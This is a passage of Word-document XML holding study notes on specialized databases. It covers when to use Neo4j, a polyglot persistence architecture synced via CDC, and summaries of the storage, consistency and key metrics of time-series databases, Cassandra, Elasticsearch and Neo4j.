    <w:p w14:paraId="5592F71D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021EEF7A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Examples: GitHub (code search), Wikipedia (article search),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5C9EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            Netflix (content discovery), Cloudflare (log analytics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB06230" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0CB3BB29" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Neo4j (Graph Database):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FC0B3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3084B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Relationship traversal is the primary query pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F6932" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Depth of traversal is variable or large (&gt; 3 hops regularly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A537669" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Connected data analysis (fraud rings, recommendations, knowledge graphs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF26C6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Graph algorithm application (PageRank, community detection, shortest path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35360948" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Relationship properties are as important as entity properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750EE2D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57219AEA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  DON'T USE WHEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40D50E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Simple CRUD without meaningful entity relationships</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353A4FF4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Heavy aggregation on non-relational data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191A23A0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Time-series or document storage without graph structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD57EC1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Team unfamiliar with graph data modeling (steep learning curve)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C6C7C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598A97A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Examples: LinkedIn (professional network), eBay (knowledge graph),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E7D960" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            Airbnb (community detection), UBS (regulatory compliance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B0234" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="18E065ED" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The Polyglot Persistence Architecture (using multiple specialized databases):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B2F130" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DBB234" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PostgreSQL:     source of truth for transactional data (orders, users, payments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315040CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Elasticsearch:  full-text search + analytics layer (synced from PostgreSQL via CDC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED285A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Redis:          caching + session store + rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5E7D0A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  InfluxDB:       metrics, monitoring, IoT telemetry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF979D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Neo4j:          relationship analytics (recommendations, fraud detection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E98379B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cassandra:      high-volume append-only data (events, logs, audit trail)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5099F96B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E025BFB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Synchronization: CDC (Debezium) from PostgreSQL → Kafka → downstream systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F8B6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Each system optimized for its query pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE45C8A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Trade-off: operational complexity of managing multiple systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBEFDDC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">             vs performance and scalability of specialized systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1DD810" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="189CEE61">
          <v:rect id="_x0000_i5963" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF68A18" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291CA1F9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7E8C79" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Specialized Databases = Purpose-Built Storage + Index Structures + Query Languages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DFCE94" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                        Aligned With Domain-Specific Data Models and Access Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04EEB0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="1445B792" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Time Series Databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A02997" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Core insight: time is the primary dimension, writes are sequential appends,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08685FA0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                values are highly correlated across time → compress well</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27292178" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Storage: TSM/LSM-Tree (write-optimized), columnar within time windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF5AFBD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Compression: delta-coded timestamps, Gorilla XOR floats → 5-20× compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63D9E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Key operations: range scan + aggregation (avg, rate, deriv), downsampling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AA35B9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Critical metric: cardinality (unique series count) — keep below 1M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DBE1C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E70AA84" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Internal alignment: append-sequential writes → sequential I/O → no random write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A5807" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance origin: each "series" is physically contiguous → one scan per series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661FE8B8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="712FD56C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cassandra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531B96BB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Core insight: partition key determines data location, all related data co-located,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64725F92" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                ring topology enables linear scaling, AP by design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C94380" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Storage: SSTable + LSM-Tree, commitlog WAL, memtable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2F48B6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Consistency: tunable (ONE to ALL), W + R &gt; RF for strong consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07054556" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Key operations: single-partition reads/writes, time-range within partition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7041B833" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Critical metric: partition size (&lt; 100MB), tombstone count (&lt; 100K per read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24447311" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF1470" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Internal alignment: partition key → consistent hash → node → local read/write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BFEE8C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance origin: no cross-node coordination for single-partition operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F2D07" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="76DF39E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Elasticsearch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBD8DB6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Core insight: inverted index makes full-text search O(1) by term,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF278E0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                BM25 ranking produces relevance-ordered results,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771409A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                distributed sharding scales to billions of documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C35B87" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Storage: Lucene segments (immutable inverted index files), doc values for aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9B40A8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Consistency: eventual (near-real-time, 1-second refresh default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C351D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Key operations: full-text search, complex aggregations, faceted search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E6955" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Critical: shard sizing (20-40GB per shard), cardinality for aggregations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBCCE0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EF95E6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Internal alignment: inverted index term → posting list → O(1) lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D56814D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Performance origin: pre-computed term-document mapping vs sequential scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAB64A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0C403F7F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Neo4j (Graph):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D097CC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Core insight: index-free adjacency (relationships are physical pointers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385C2A7A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                not indexed references) makes traversal O(degree) per hop,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D65B18" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">                independent of total graph size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34717A37" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Storage: native graph store (fixed-size node/relationship records, pointer-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006A694D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Consistency: ACID transactions (unlike other specialized databases)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D564FDF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Key operations: path traversal, pattern matching, graph algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4342C786" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Critical: dense nodes (high-degree), avoiding full graph scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ED36C8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B89BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Internal alignment: node → relationship linked list → O(1) neighbor access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C03E3A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Performance origin: pointer traversal vs JOIN on indexed foreign keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122008D2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="71FF1A48" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The Selection Test — One Question for Each:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A02C9F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Time series: "Is time the primary axis of every query?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DCC254" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Cassandra:   "Do I know the partition key for every query at design time?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7117DFF0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Elasticsearch: "Do users need to find documents by arbitrary text or complex filters?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF6E8B5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Neo4j:       "Is the query 'what is connected to X, and through what paths?'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A3E99" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D503B10" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
